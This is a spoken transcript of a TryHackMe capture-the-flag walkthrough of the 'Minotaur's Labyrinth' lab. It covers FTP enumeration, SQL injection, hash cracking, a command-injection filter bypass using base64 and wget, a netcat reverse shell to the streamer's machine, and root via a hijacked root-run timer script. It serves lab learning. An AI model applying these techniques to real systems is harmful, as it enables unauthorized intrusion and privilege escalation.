Welcome back. So today we're looking at Minotaur's Labyrinth.
Alright.
Oh no, that is two voices at once. There we go. Wonderful day today. I only have Twitch up on. There we go. There we go. Alright, I can do this. Little by little, I'll get this done. Alright, so, yeah, Minotaur's Labyrinth. I already started with the machine. Let's go ahead and grab the IP address. And let's make a directory in desktop, try hack me, and we'll call it Minotaur's Labyrinth. See it in there. And we'll go ahead and start off with mmap. You know what I like to do, you know what I should probably do first is actually, get on the VPN there. That might be the first thing I want to do. Alright, now we can start with mmap again. 21, 83, 3306, and 443. So it looks like we got a MySQL server up and running. That's actually pointing out toward the internet. Port 21 FTP, 80 and 443, so HTTP and HTTPS. So let's go ahead and check out that port 21, mmap P21, SCSV. Right, we're going to do default scripts, look at the version of it. Let's also go ahead and do that for, we'll do that for port 80 also. We'll see if port 80 and 443 are the same thing. Hopefully they are. We'll find out here in a second. Hopefully it's not two totally different websites there. So we'll do a little BAM, and then we'll do another HTTPS. Let's see the certificate. So I want to view the certificate, see if anything crazy is going on inside of it. Doesn't look like it. So far, at least. From what I can tell, like right now, it doesn't look like it. So let's go ahead and accept the risk and continue. We get a login page and a login page. Alright, cool. Click here for root flag. We'll do. Damn, close, I should just get these guys on Twitter and say, hey, well, as close as name is close to mine. Just get them on Twitter and just say, hey, what's the root flag? That did find your box. Let's try a simple SQL injection at first. See if that does anything. Submit that. Alright, that didn't do anything right there. We start with SQL map on this guy, and also let's go ahead and start with GoBuster. It looks like the same site on each one of them. 2.4.48 also for the Apache version. And it also looks like anonymous login is allowed. So let's stick with one thing at a time. Let's go ahead and get that FTP anonymous login. So we'll FTP into here, and then we'll start looking at the website. Well, you know what? Might as well start with GoBuster while we're doing this, though. Anonymous, no password, and we'll go ahead and do a GoBuster dirtac u. And we'll start off on port 80, see if we find anything. Hopefully it's, what is that? Because we have to log in, huh? That does not help out at all. HTTPS is going to be the same exact thing, too. Alright, that's okay. Login incorrect, login failed. ANONYMOUS. Exit. Anonymous login, FTP login allowed. Let's try that one more time. The anonymous that time. Usually I just don't do a password and it just lets me right in. That's weird. Okay. Let's go ahead and do a directory. Camera's like way to the side. There we go. Okay. Or I'm actually way to the side tonight. NSC acting up there. No. Usually I just do an anonymous, no password, and that lets me in just fine. Looks like we can move around here. Can we CD into pub? We can. So we can move around inside this guy. Let's go ahead and get message.text. Make sure there's nothing hidden here. Nope, there is. CD.secret. Get flag.text. Get keep in mind.text. And let's go ahead and CD back. That looks like it's it for that. CD back. And let's see if there's anything. Let's see if I can go any further back. Let's see how far back. Okay, that's how far back I can go. So I can get in the pub. And then we had that message.txt secret. And then I went in there and grabbed those guys. Let's go and do an LS-TAC LA. We'll see what we have so far. Going cat the flag.txt. So we got our first flag. Easy day. Let's go. Easy day. Alright, there we go. There's flag 1, I guess. Cat keep in mind.txt and cat message.txt. Okay, so not to forget, he literally, okay. This is a clumsy person. He forgets a lot of things around the labyrinth. Have a look around. Maybe you'll find something. Minotaur. Not to forget, he forgets a lot of stuff. That's why he likes to keep things on a timer. Literally, Minotaur. Okay. You know what? I think, did I do that? Like we're not going to be able to do anything in there, any type of go bust or anything like that, because it's going to continue to kick me back over here. So I'm wondering, should we try to brute force maybe Minotaur? Minotaur's one of the users maybe? Or should we just start with, well, I don't think I can get anywhere because of this login. So, yeah, it just keeps returning me to login.html. Bunch of crap. Goes to login.html. So it just keeps returning me to that. So I'm not getting like a full 4 or anything like that. Maybe maybe some SQL injection. Let's try that. We'll do tac forms. DBS, Jesus, there we go. Searching for forms, and I can't find any forms in it. Great. Okay. So that can't find any forms or anything like that. I wonder if we can go start to look at this over here. I'm on the right IP address, right? 10.10.83.157, yes. Slash. Yeah, I can't get anything there. Slash JBait. Do we do anything in there? Okay, at least he's looking now. At least he's trying this time. So I can't, so far, yeah. So we got FTP. We got it there. We tried a very simple SQL injection. That did not work so far. We grabbed a couple of things from FTP, but we still haven't found anything yet. Like there's no, we can't. Let's try with Derby. Maybe like Derby or something like that, because I know sometimes GoBuster messes up whenever there's login, stuff like that. I forget how Derby things even go. Okay. We don't know a login yet, so let's just go ahead and try like this with 10.10.83.157. Okay, he's actually going through stuff at least. For some reason, GoBuster was not. What is he saying now? Error, the server returns a status code that matches provided options for non-existing URLs. Huh. Derby's at least trying something, so let's stick with Derby for now. Go into that. Usually trick people. Yeah. Yeah, I know which one JBait is. That's why whenever you click on it, you just go to their Twitters, but just see what's going on there. What's up, Howlett everything? So we are doing Minotaur's lab today. So far, we found anonymous FTP login, and we grabbed a couple messages in there. Nothing special though with those messages. So if I do an LS-TAC LA, we found the flag, and then keep in mind the message. All it says is that some dude's forgetful. Validus. I'm gonna go with that. I'm not really good with the you know. So, but yeah, we couldn't get GoBuster to do anything, so we're using Derby, and hopefully he finds stuff. GoBuster's looking at a totally different thing. That's probably not gonna find anything up there, but. Yeah, I mean, it's a good try. So we're just kind of waiting for Derby to finish up over here. I wonder if Dirtbuster would actually do better. Then we click on Go Faster. Go faster. You can't just do like a user share word list Derby comma.text. File extensions don't really need file extensions. We do. It's definitely HTML though. I guess we could look for text, zip. Thank you very much for your follow. Hold it everything. Thanks a lot. Maybe it's an easy password. Yeah, I was thinking that too, but I don't know a username yet. I'm thinking a username is most likely going to be, you know, probably Minotaur or Daedalus or whatever. But and if I do I'm mostly gonna use Zap. But I like to get at least a username first, like an actual. Okay, yeah, that is a username, which we do have one. I mean, we have Dallas. There wasn't anything in this thing about brute forcing though. So we could try something like Zap and start to try a password on it for brute forcing it. I don't like brute forcing. That's my thing. I just don't like brute forcing. There's always another way. However, if you are getting ready for the OSCP, brute force it up. Because it has the OSCP way like right there. Oh, you don't know? Brute force. Oh, this? Brute force. Okay. Let's go ahead and see what he finds with this. See if he even sees that form. Because SQL map couldn't even see that form. So we would have to use GoBuster for it. Which that would be truly horrible to use GoBuster for something like this. And he's not doing it either. He's not actually seeing that there's an actual form there. Login. Probably because it's a run like that. Probably because it's JavaScript. Maybe that's why it's not being able to see it. Can we attack this guy? Fuzz him? What do we got here? Maybe do a little... Get him to load. AA. Did he break? We do have a bunch of APIs in here, though. Creatures. I think I might have broke them. I think Zap just broke him. Let's keep doing stuff till we know we're going to have to brute force him. Because Zap is just holding at 52%. I think Zap just broke him. Like right there. Nmap should have found 8080 by now also. If like 8080 or anything like that was up and running. You should have found that by now. So, however, Rusty has I think you can use burp to capture. You can use burp to capture it. It would be SQL map TAC-R. For if you use Burp Suite and then put it into a text file, it would be like this. So we'd start up Burp Suite, and from there we can actually. Here's another little thing with Burp Suite also that we can do. We can actually send an SQL map payload. Well, not SQL map, but SQLi injection at it, and just let it just run. And that actually doesn't usually take too long. Even though I don't have the awesome cool version. I'm just a peasant, but. If we do a little, we submit that, grabbing it here, right? It's also saying email too. You notice that? This one says username, but then whenever we get over here, we're seeing email equals. So that's strange. Now we're going to send this to the intruder, right? And we'll go to positions, and we don't care about that. We can go ahead and clear that out, right? We can just leave the password as A, so we don't care about that like right now. We're just going to stick with email for now. And we'll go to payloads, and we're going to load in there user share word list. And we're not going to, we're going to use, let's see here, is it seclist, I believe? And then we can go fuzzing, and there should be an SQL injection. Yep, SQL injection. We can also do cross-site scripting injection, stuff like that. And we're just going to do a generic SQL injection. And then we're going to see pretty much what the different sizes we get back, like the length and everything like that. But this, I think we broke it though. because we're getting all 200s now. You want to know why? Probably because we started a burp suite. He's probably, I think we're breaking him. Very easily breaking him. So let's go ahead. Let's just calm down like a little bit, right? Let's just, we'll stop this. We'll stop this. We have to stop burp suite. Because we're just going to keep getting discard. Exit off here. Yes. Let's do one at a time. I'm doing way too much at a time here. I'm trying to move too fast. Alright, can we do attack threads? Attack T 200 with this thing? Can we still ping him? We done did. We broke this box. Can we ping? Just a guy, how you doing? Okay, so we're still pinging him. That's good. It says he's getting a lot of errors. We are doing Minotaur's Labyrinth today. Let's go ahead and go back into Durbuster. Still have that HTTPS. Also, we could attack both. Well, I don't know if they're both run. They're obviously most likely both run off the same server. User share word list derby common.txt. We don't need any file extensions for now. Start. Use Blake extension there. Okay, he's at least going, so that's good. But he's getting a whole bunch of 200s now, which we obviously realize that is incorrect. we broke the box. All right, well, let's restart this guy because we have broke this thing. VPN, OpenVPN 2.6. I've noticed you've definitely had a lot of errors because you're saying all these are 200s. All those are not 200s. So, oh, we got 302 like right there. That's good. All right, let's go ahead and let's restart this guy. I think I might have broken him when we did SQL injection along with Burp Suite, along with GoBuster and Derby and everything else at the same time. I think we might have. It said that he likes timers, you know, so we gotta move quick. Whoopsie daisy. That's okay. And during the CRTP, there's only one type of, well, there's a certain type of VPN. 2.6 actually is the one that you have to have or else it doesn't work. It's pretty funny. It's okay. It's okay. I've broken many boxes, Frank. many boxes I have broken. Broken boxes that were networks. And then, whoops, you know. Frank, when you go through EJPT, it's actually, this is public knowledge, and it is in your rules of engagement paper. It's in there. You have a not word list. You have a, what is it? Wireshark. You have a PCAP, okay? It took me about 3-4 hours. Okay, yeah, you will not forget it. Thank you. It took me like 3-4 hours to do the EJPT. All right, but it took me like an hour and a half of that was not understanding where I'm supposed to find this file at. So this other IP address at. No, he can't resolve the host, but it might not be up also. He did say that might take a couple minutes to start. I mean, he looks like he's up. He's definitely up and running. Couldn't resolve host. Do I have to change it to... Wonder if I have to change it to something. Okay, there we go. Let's go! Yeah, I was gonna say with the EJPT, I actually did the attack, the main attack that's in it. I actually did that like a day before that. On Try Hack Me. So when I got into it, I was like, huh. And I just did the same exact attack again. I was like, oh, there we go. And I'm networking, so the routing portion, I was like, oh, I never did routing on Linux. I never did IP route. You know, I never did that before. But I just looked at it and I was like, okay. And I looked at it like this, and once I finally found the Wireshark document, I was like, ah, there we go. So want to visit in-laws and stuff? I'll think about taking the PMPT next week. Not this, the week after that. So, because next week I'm still going to be working. The week after that, I have off again. So I'm thinking about taking the PMPT. And, okay, I don't want to move this damn slow. I'm not going to be able to do that, huh? We're going to have to move that slow, aren't we? Is it TAC T? Is it even TAC T? What am I trying to tell it? What is TAC T? Don't force an ending. Oh my god. I'm just adding in a 100, 200, some of that. Is there threads for this guy? If not, we're just going to use Dirtbuster because we're not running it that slow. It took a lot to crash it beforehand, so... Okay, let's do Dirtbuster. $200 threads on there. User share word list derby. Comment.text. Do I have a LinkedIn? I do. Ryan Yeager. So you gotta figure out how to spell Yeager now. I'll give you a hint. It doesn't start with a J, and it's not Y-E-A-G-E-R, and it's not Y-A-E-G-E-R. Hopefully it doesn't break this time. We'll find out, though. But we are getting... It's coming back with hundreds of things here. But if I do it down here, it's not coming back like that. Maybe it just can't take a large amount at once. Maybe it just can't do that. It looks like it just can't take it. Like to drink Coca-Cola Classic? Yeah, always have a Coke. It's my hydrate. I think you just can't take a large word list. I did root tor. We try root. Try to see if MySQL has anything in it. Since we had that 3306 opened. Did we break this dude again? Do we just automatically break it if we do like a 200 on it or something like that? It's just automatically just like, nope, I can't do this. I think so. I think as soon as we do it, it's just like, yo, I can't do that. Like, okay, there we go. There we go. Okay, I'm just not going to touch anything. I'm just going to back off. Let it do its thing. This one might take a minute because, dear God, if I look at it wrong, this one might break. Be something really odd about this box. So far, it's everything's at 200. Depending on what, how fast you're going. I'll say, Kretz, if you're on the Discord, it'd be really, really easy to find my LinkedIn because it's literally like on Discord. I just actually posted the CRTP cert. Yeah, I'm about to say it. I'm not very secretive. I was born in a hospital. All my information's already in a computer system. Joined the Marine Corps. It really all went in the computer system. Freaking VA gets hacked every other week. It's everywhere. I was like, oh. Although, something cool about me is that sometimes I disappear. Yeah. Yeah, like no joke. It's cool, but it's not. Like when you go to buy a car and you don't exist anymore. That's fun. Like your social stuff like that just doesn't exist. I've had that happen quite a few times now. And then 2 days later, I do exist again. That's a lot of fun. I don't know why that's happened. I think it has to do something with when I was doing training one time. We were using this system. It's called, God, what's it called? GLIDS? Was it GLIDS system? It's a system that, you take a fingerprint and it puts it into this file system, everything like that. And it was used for terrorists and stuff. It's probably used for a lot more stuff than just that. But it was used for terrorists and bomb makers, things like that. And we would go around and we fingerprint, the locals or whatever. And then freaking, if we found like a bomb or something like that, they might have been able to pull a fingerprint off it or ID or something like that. They could pull fingerprints off. We could then put it against the database and we could see, oh crap, it was this guy, go and grab his ass, Or we would, I want to check out the API also. Or that like if we kept noticing that the same people were around IDs every time they went off, that's obviously something we want to look into, It was a system like that. And so we were doing training with it. And the problem is that once you find someone that has been building IDs or whatever else, and you put them in the system, and you actually click a certain button, they get put in the national no-fly list, right? Well, when we were doing training, they didn't realize that the system that we were utilizing was live. We thought we had the dead one, right? Which is, there's a training system and there's a live system. We were live. So I actually got put into a do not fly list. And of course, all this paperwork and everything that had to be set up. So we had to put up all this paperwork and everything. And ever since then, like I don't exist sometimes. All right, so we got to create PHP, delete, read, search, and update. I probably want to look at read. Okay, that doesn't work. Okay. Thanks. Search. Thanks. Update. All right. So nothing really in there. People. Now I was kind of hoping I could see everybody. Okay. Alright, so nothing really happened inside there that we can see so far. But we do know that it is running PHP, right? So we could just start to look up SQL injection payloads. It did say Mariah database, didn't it? We say for we can start throwing payloads at least at that. We're not going to use Burp Suite again. Because by God, we broke it last time with that. Grab something like this. See if we start dumping people. Put for the username and the password. Okay. Nothing there. Nothing there. Is it possible another server know they use burp? I don't know. Because you're picking it up on yourself. I mean, it could probably see it's probably doing something to like the header or some of that, where it could definitely see, something's changed. Time based. I don't think it's gonna be time based. That'd be absolutely insane. I don't think it's gonna be anything like this, like right here. I think if it's anything, it's gonna be regular because this is just a medium box. It wasn't anything crazy. Okay, we're still not dropping anything. The only thing we have over here is the CSS and this API page so far. We don't have anything else over here yet. Alright, so it looks like we're going to wait for that brute force to end. And then we're just going to go from there. I'm just going to let this guy just do its thing. We can't get into the MySQL. We got into FTP. Doesn't look like SQL injection, at least easy ones. Doesn't look like they're working like right now. That search.php, did that go to login.html or did it go to something.php? Login.html. Okay, so this is returning us back to there. So but we're just gonna let these guys do his thing. He might take a minute. Apologize. No, it's not really my fault. I can't do more than 10 threads at a time, it looks like. At least we know we can go other places. I'm in a hurry. I want to go to bed. No, I was kidding. Hurry up! Time to go to sleep. No, I'm just kidding. But yeah, no, I was going to take the PMPT, right? So, of course, I started looking up reviews. I love watching reviews. Love watching, how long it took other people to do it, where they're at in their careers, things like that, and their learning stuff, that they're brand new, everything like that, right? I don't know. I have no idea what your OpenVPN password is. But, yeah, I was looking up some reviews, and one of the guys said that every single thing that you need to know is in the PEH course. They said everything else is just a deep dive into it. So it's not, how you can get like 5 courses or whatever. So I had those 5 courses. He said that everything that you need to know is just in that PEH course. I was like, huh. So I think we're just going to look at the open source intelligence part of that and just go from there. All right, we got Labyrinth user. Wow, look at that, huh? So you just keep going around and around and around. Wow. I mean, I'm sure if, you were down there and walked through it, it'd be super confusing. Oh, the login is a labyrinth. I didn't even realize that. That is just too cute. All right, so yeah, this is literally just the images, okay? That is just something else. I didn't even realize that. Good job, machine maker. Maybe it's steganography. Those are the best. Callie? Is that it? The hell is that? A0. So I wonder if it starts at 0 or 1 though. Looks like we might have a password there. Password generator for dataless. I wonder if it starts at 0 or 1. That would be 10 if it starts at 1, but then these guys have more, it looks like. So I wonder if A starts at 1, these both start at 0. So that would be 0. Is there any A0? No, there's not. Well, let's what was that? Logs? Okay. That looks more promising. Post log.log. No, there's a password like right there. And then, okay, so we got a username and password. Don't remember how to spell that guy's name. And let's go ahead and try to log in with that. It says great hacker's password. Oh, you guys. Or guest hacker or something like that, I don't know. Alright, so that does work. Cool. Alright, looks like we have a people search. Can we just do like an A? Alright, we know that dataless exists, so let's do a D, search. No? Okay, can we start doing some SQL injection in here? Okay, yes we can. So we have SQL injection in there. Looks like we dropped a whole bunch of passwords and they are all hashed. So let's go ahead and do a sublime user hash.text. And we're still going to try crack dataless because I don't know if that is going to be, I don't know if that's like the same site. This could be for like SSH or something like that. You know what I'm saying? So we could probably use John the Ripper for this, like right here. I think I had the SQL injection already up, huh? For what? I tried root password, didn't work. Think it would think. Frank, what's the OpenVPN for? Is it for try hack me or is it for another box? So you connect to EJPT's network. Do you have to generate credentials or whatever? Are you taking the EJPT like right now? They give me the file, but it asks for username and password. Open up the OpenVPN file. And I think you're supposed to, on the actual exam, you're supposed to be able to regenerate credentials. Top right-hand corner of the dashboard, click the hamburger and select lab credentials. That was a 4. Gotta save that, and let's go ahead and do a And the top, I don't know if you heard me or not. Just did that. Read down the VPN file. Okay. So you just in the top right hand corner over, you heard me about that. Click on hamburger and select lab credentials, and that should give you. Okay, cool. It should be something like really stupid long that you'll never remember. And then like student or something like that, and then some stupid long password. It's not hashed or anything. That's just a stupid long password. All right. So let's go ahead and do a John user hash.text tac word list. We're going to say equals user share word list rocky.text. Let's see what we can find here. It doesn't know. It's probably, I'm going to go with it's an MD5 hash, but let's go ahead and find out. Let's go ahead and throw it into, I don't know if any of these can even be broken also, but let's just go ahead and throw it into Google. We'll see what type of hash this is. I'm going to go with the MD5. But MD5. Yep. Okay. So we got, looks like MD5. That's what that picked up as. So let's just go ahead and do a raw MD5. Tac format equals raw tac MD5. Tac fork equals 4. All right, there we go. Let's go. So we got 3 passwords now. Now I'm wondering if any of those can SSH in. We don't have SSH. I don't know why I'm trying to SSH in. We don't have SSH. Okay, so we got those passwords. Does that do anything for me? What did this just do for me? Did I just waste my time with that? I feel like I just wasted my time with that, huh? Let's go ahead and do a dir-b with the username and password. Oh, what's that? PHP my admin. Oh, that's code 403. Never mind. I got excited for a second there. Let's go ahead and do a dir-b. That guy. And we're going to do slash. What if I just do like attack you and just put in? Because he's not logging HTML anymore. He's index.php now. You know what I'm saying? So now he's a PHP site. Can I just do it for slash index.php? Yeah, hash identifier or hash ID. I used to have it. I used to have it a while ago, and then it's like it broke at one point. I wonder if any of those other guys have any more permissions or anything like that. Minotaur, told you not to keep your permissions on the same shelf as all the others, especially if the permission is equal to admin. So we want to get his Minotaur, it looks like. And did we... Oh crap, I didn't grab Minotaur stuff, did I? Why didn't I grab Minotaur stuff? I thought I did. Okay, let's go ahead and actually go back over in here because I've never seen Minotaur stuff. And if he's equal to admin, then we might have more rights on this thing. So, was it like M1? Here. What did I use here? That guy. Go ahead and drop this again. I guess I didn't grab Minotaur by accident, or he didn't crack. No, I didn't even grab him. Never mind. I thought I had something last time with that. Or did I add another dash in there? Did I do another space dash? Yeah, there we go. Thought I grabbed him last time, but obviously not. I can think all I want, but that doesn't mean it actually happened. Why does it keep... There we go. Probably did grab it last time, I just messed it up like that. Let's try that again. And Minotaur, there we go. So if he's equal to admin, let's try logging with him. We might have more something else in here, you know what I'm saying? Oh, still just people. Oh, there we go. Oh, there's a flag there. And secret stuff. Let's go! I wonder if I can just control you. Let's not go. Oh, there we go. Alright. There we go. It says the database flag. Is that like the next one or something? Did I exile try hack me by accident? I think I did. Exciting. We have two different web pages open right now. I have two different web pages open. Okay. Alright, cool. Let's keep going. So we got that, right? Let's go ahead and hop into what was that? Secret stuff? So we have an echo. We say like who am I? Can we pipe stuff? We can. We can pipe stuff. Alright, easy day. Easy day. DZ64, how you doing? Alright, so if we can pipe stuff, let's go ahead and just try grab like a reverse. Let's see who's in the home directory first. See if we can pipe ls/la/home. See if we get an RSA key, because that'll be easy day. Minotaur. Minotaur's the only one in there, okay. And it's spelled correctly also, it looks like. So let's go ahead and do a ls/la home Minotaur. See if he has a SSH key. Okay, so he does have .sh in here, so nothing in there. Damn. Just to make sure, we'll try cat it. You look, this is gonna be possible. I fixed this. Oh, he fixed it. You Daedalus, you got me on that one. All right, let's go ahead and look up. Let's do a reverse shell. Let's do which netcat? Yeah, in English. So we do have netcat. Okay, let's go ahead and do a cat for my scripts. Netcat reverse shell.txt. So I'm gonna grab this guy right here. This whole thing. Right, and we will do that for 10.13.26.184, which should be my Kali IP address. We go into ifconfig. 10.13.26.184 nc tag lvmp 4242, and let's go ahead and echo that in there. Home. Make sure I pipe it. Hold up. Okay. He's looking at characters. That's what he's doing. Yep, he's looking at characters. Let's not go. So we know we can do slashes, so we can't do that guy. Base 64. Base 64. Let's see if we do something like that. He might have fixed that, but can we do a 10.13.26.184? Then we'll do a base 64. Put him like that. Throw him into, pipe him into here, right? And then from there, we should be able to do a base 64 attack D. Pipe is, what is it? Pipe is bash, right? Do we pipe it as bash? Or is it like bash P? I think we pipe it as bash, right? If we were on base 64, then run it. I feel like that's what we do. I also have to echo that too, don't we? Echo. That guy, there's a space in there also. There shouldn't be a space in there. Okay, let's go ahead and try that. Nothing with that. I'll move this guy over. Is it because of that equal sign at the end? This is Labyrinth. Minotaur's Labyrinth. Is it because of that equal sign? Wait, can we not do an equal sign? Let's not go. We can't do an equal sign. So that means we need to pick a different payload. My IP address is not going to work with this one? It all depends on what your IP address is in the end? Or can we do like a /G? And maybe we'll get not an equal sign? Which Python? So there's Python 3 on here. We should have bash, right? We do have bash. Okay, so since I have an equal sign at the end there, I don't think I can use that payload like right there. So let's go ahead and do an echo. Let's go ahead and cat, even though... I'm glad that someone else has verified this also, that bash does not like to work and try hack me. Ten 10.13.26.184. Yeah, 4242. There's two equal signs on that one. That's not going to work either. Go! Poops McGee. Oh my god. There's two equal signs on that one. Thank you very much for the follow, Ridge Racer 1603. We're just trying to figure out what we can actually use. We can't use a reverse shell that has an equal sign at the end of it. That has two equal signs also. Can we like W get something? We can. Can we just put a file into here and then run it? Linux x64 shell reverse TCP. Can we do a uname tech A? Okay. Anybody think this is going to work? Why aren't we using PowerShell with Metasploit? Will make life easier. PowerShell with Metasploit? What do you mean? This isn't a Windows box. So... a PowerShell script on this thing would... that'll make my life harder. I think I do need to read Greek methodology. I think I can't have an equal sign at the end, so it's all about what your IP is and try hack me. That's if you can do this or not. A PowerShell shell. You just want me to just use PowerShell, huh? wget http 10.13 26.184 shell.elf. And then let's go ahead. That's discrimination. It is. It's discrimination against 10.13 26.184. And I don't know if I feel right about that. So now I have to go above and beyond, I feel like. Okay, we can't do a wget. None of the payloads are working because the IP address that we're using puts an equal sign. I think it's the IP address, but all the payloads that we're using have equal signs on the end of them. Can we upload a PHP reverse? Because we know it's running PHP, right? How the hell am I supposed to get a whole... How am I supposed to... Metasploit for Windows, you can do that. You can download Metasploit on Windows. How am I going to do this one? Because we can't base 64 it because of the equal signs at the end, right? Because it's saying that the equal sign at the end, it's saying LSTAC LA. If I do an equal sign, I hit enter, saying I really think it's going to work. Let's go with CyberChef. I have an idea. To base 64. Hey, thank you very much for the follow, Costello. Jose Costello. Damn, put more equal signs on the end of it. So we can't do an equal sign. Right? What if we do... Nope. Can't echo an equal sign. So we can't do... what if we do something like this? What exploit pack? What is that? You can just download. You know you guys can just download. You can download Metasploit for Windows, you know. What if we can... That way. No. How are we going to get this guy to run it? If ours has equal signs at the end of it, and equal signs are not allowed to be used on the machine itself. This is... Wow, this is a real brain stumper, huh? This is a hard one, like right here. How are we going to run you? How are we going to run you? Anybody got any ideas? I don't have any because the machine still has to run it, right? So we have to do like base 64, base 32. We can't put in an ELF file. We already found that out because I was like, okay, we just upload an ELF file. We can't... Well, we can't put an ELF file. Can we put in a Okay, let's try this. Got no idea. Let's go ahead and nano. Grab that. We're going to nano shell.sh. Then bash, right? And then we have to tell it to run, right? So we have to tell it to like, hey, we want you to run this guy, like right here, right? So can we just do, I think we can just leave it like that. Because I think we just do a bash shell.sh. Yeah, we can. Okay, cool. Okay. So can we put that guy in there? And then try to have him run it. Experience may differ with this boxing right here, so everyone knows. Experience may differ. Okay, let's try to do a wget blah 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 HTTP .13.26.184 slash what do I call it? Shell.sh. Okay, let's go ahead and echo wget HTTP 10.13.26.184 shell.sh into a base 64. Equal signs. Okay, what if I call it like AOS? So we're going to move shell.sh to s.sh. We have no equal signs there. So now we can wget. Wait, how do we go run this? That already is a wget, right? So let's go ahead and make sure that we have our server up running. We do. Okay, let's go ahead and do a pipe control V. /temp/s.sh, s.sh, something like that. No, we can't put that guy in there, can we? Let's try to just do that. Echo. That did just do shit for me now, did it? How am I going to do that? Oh, I should probably do a base 64 and everything else. So we should probably do a echo. That like right there. Base 64 attack D. Bash. Hey, we got it. Okay, so we did that. Now we just have to run it, right? So now we just have to do like a bash s.sh. Damn. Do we have to change mode, I'm wondering? Change mode s.sh. We can't do a dot, can we? I don't think. Yeah, we can, okay. Change mode 777 s.sh. Okay, now let's go ahead and do a ls tac la. Let's make sure you actually got it. It's actually still in there. How about that? There's no s.sh in here, is there? Okay. So he did not save that s.sh. So I'm thinking now we got to put in like temp folder or some of that. So let's go ahead and do an echo. Which one was it? The D one. The D. Minotaur wants the D. Oh crap. Echo that, right? And we're actually going to save that into how the hell have we saved it somewhere else? Like, could we do like a taco? Yeah, I mean, you don't want to open up that. Plus X is best practice because then 777 opens up to everybody. Could we do like a taco? Like after all that. Let's add that into this guy up here. So let's go ahead and do a tac O for the out file, right? As /temp/s.sh. And we'll go ahead and echo that whole thing into a base 64. And now we have that again. Is the dot what's messing? What is actually messing this thing up? How about that? Because the dot's not messing it up. That's not messing it up. So what is actually messing it up? Yeah, what is messing it up in there? Is what I'm worried. Is it the W get? Because I can do which W get, and it's not giving me that, right? Is it this guy? Is it it's that. Okay. Damn. Alright, so we might actually have to even do that, huh? We can do a W get 10.13.26.184, and that should just bring it to HTTP, right? /s.sh o/temp/s.sh. I did not see it. I was actually streaming during it. I didn't really care too much. I was like, oh. I didn't realize that they were streaming at the same time, so I thought that was pretty funny. bash/temp/s.sh. Let's go! Alright, we are getting somewhere. Let's attack LA. Let's go. Okay. CD into /home. So, I wonder if Minotaur reused his password. I don't remember what his password was. Oh, it was Python 3, right? Full shell, Python 3. Okay, what we got there? $32.89. Shell died. What do you mean? Shell didn't die. We got it. That's you in the Minotaur. That's you in the Minotaur. And let's go and grab his password again. A Minotauro. See if we can do that. See if we got some password reuse here. Doesn't look like it. Okay, let's go ahead and CD in the Minotaur. Ah, permission denied. Okay. We got quite a few different things in here. Cut that flag. There we go. Now he's got to figure out what's next. Right? Oh, yeah, no. I was just getting a full shell, so I just backgrounded the shell. That's all. So it didn't die. I just backgrounded it like real quick. I see what you're saying. Alright, so now we have to figure out what the hell can we do, right? So let's go ahead and do a... Let's try sudo tac L first, even though I'm pretty sure he can't run sudo. I don't know. Yeah, I have no idea. Okay, cool. Okay. Weird user, that's all. Let's cat scripts SUID lookup. See if we can mess with anything. Any files or anything like that. See if there's anything to mess with. And I guess we'll go ahead and we'll try to do like oh, my dogs. Hey. Haven't seen my dogs in a while. They're back in Virginia. Limpies, so we can locate limpies. Grab that guy. That's a lot of crap. I've never seen this much stuff before, but it's all just kind of repeated. And none of it is anything that is really standing out to me. I think limpies might be our friend today. Yeah, I think limpies is going to be our friend today. limpies.sh. Go ahead and bring him over here. Here, we'll do this. Make it safer. Change mode plus X. limpies.sh. And we'll go ahead and run that. We'll see if we can mess with anything in there. Watch that video here after they're done with this one. Why do I need a suit? I don't... What? That was super weird. Never seen limpies do that before. So that's for a sudo password in like the middle of it? I don't think I've ever seen that before. That was a weird one. Just looking for anything that's standing out like right now. MySQL is not, well, I mean, it's running, but we got the password. I mean, we could look at MySQL, but that's most likely going to be for the web server. There's no SSH in here or anything like that, so we already got all those passwords. Is there a cron job running? There's a cron job running, I think. I think there is. It was talking about time the whole time, wasn't it? So let's go ahead and try to do a cat Etsy cron tab. Nope. Okay. Huh. All we have in there is those two. What's that? Please troll Ray. Just give him a little. Let's see here. There we go. All right. See, maybe desktop. Maybe he has something on here that we don't know about. Documents. I'm not seeing anything on here that's really standing out to me. I don't know if you guys are or not. Like nothing at all is really like, go there, you know? So that's a little bit confusing. Because I have no idea. The only one we have left is the root flags. It's going to be in root. The problem is we need to obviously increase our privileges. And we got the user flag. We got 3 out of 4 flags so far. I'm just wondering. What else it could possibly be. Okay. Okay. Labyrinth root. Database Labyrinth roots the password. That's not hashed, is it? That is not a hash, or might be a hash. Let's find out. Yeah, I don't think that's a hash. It's going to go into MySQL. We're not allowed to log in from over here, are we? Okay. So that's not going to work. I mean, we could look for it. But it's probably going to be... Might not be able to find it. Might not even have the rights to even find it. But yeah. We need to figure out how to get to root first. Yep. I'm not about to do a Git repository. We're not doing that again. I don't think this box is going to do something like that. CD into, let me see, a var maybe? Look, see if there's anything crazy in here. We already tried Etsy and opt. That all looks normal. That all's normal. Okay. CD into Etsy. So we're going to manually enumerate this guy, huh? That all looks normal in here. From what I can see scrolling up through it. Nothing in there to find. What in the hell? Where are we supposed to go? Let's not go. Let's go! Let's not. What's going on with my dog? Oh, I got some pictures of my dog. Look at my dog. Let's go ahead and get back into user. Oh, that was regular user. CD in the home user. Let's go ahead and run the piece again, see if we have any more. We'll let it go through its whole thing. So far, we've had it kind of wait on this machine anyway, so we're just going to let this thing just go. So let that guy do his thing, and we'll look from there. We'll start looking around from there, see if we can find anything. My dog still looks the same, just older. Now let this guy just run, and we'll see what happens with it. See if we can get anything in there. Why does that start from the beginning? CD into slash. CD into everything into there. Hold up. Home equals slash root. Reminders, don't forget that text. I can mess with that file. scripts, netcat reverse shell. I think we might just have found our way in. Ten dot 13.26.184 on port. We'll say 111. NC Tech LVMP 1111. Now let's go ahead and just run that and see if it actually calls back to me. Okay, it does. And I'm still going to be the same person, right? Okay, I am. Alright, let's just go ahead and just let that just run then. Because I have a person reminder for reminders, don't forget that. Okay, let's just go ahead and just let that run. Let's see what happens. Don't forget to root? What do you mean? I can't run anything as root. But root is running that file timer.sh like right there. And something's happening with it, so it's probably in Etsy Tech E or whatever. Or cron tab Tech E or whatever. It's probably in there because it's not in the cron jobs. And we're root. There we go. Thank you. Cat the king flex.text. Flex.text. Alright, there we go. There we go. Took way longer than what I expected it to, but that is okay. That is all right. We got that box done with. Crushed that problem like right there. I plan on doing a 24-hour stream tomorrow, so I am going to go to bed. So yeah, tomorrow it's probably gonna be like, you know, starting at like 9, maybe 10 my time, a.m. my time, which is Japan. Right now it's 11:33 p.m. my time, so you kind of do the math like real quick. But 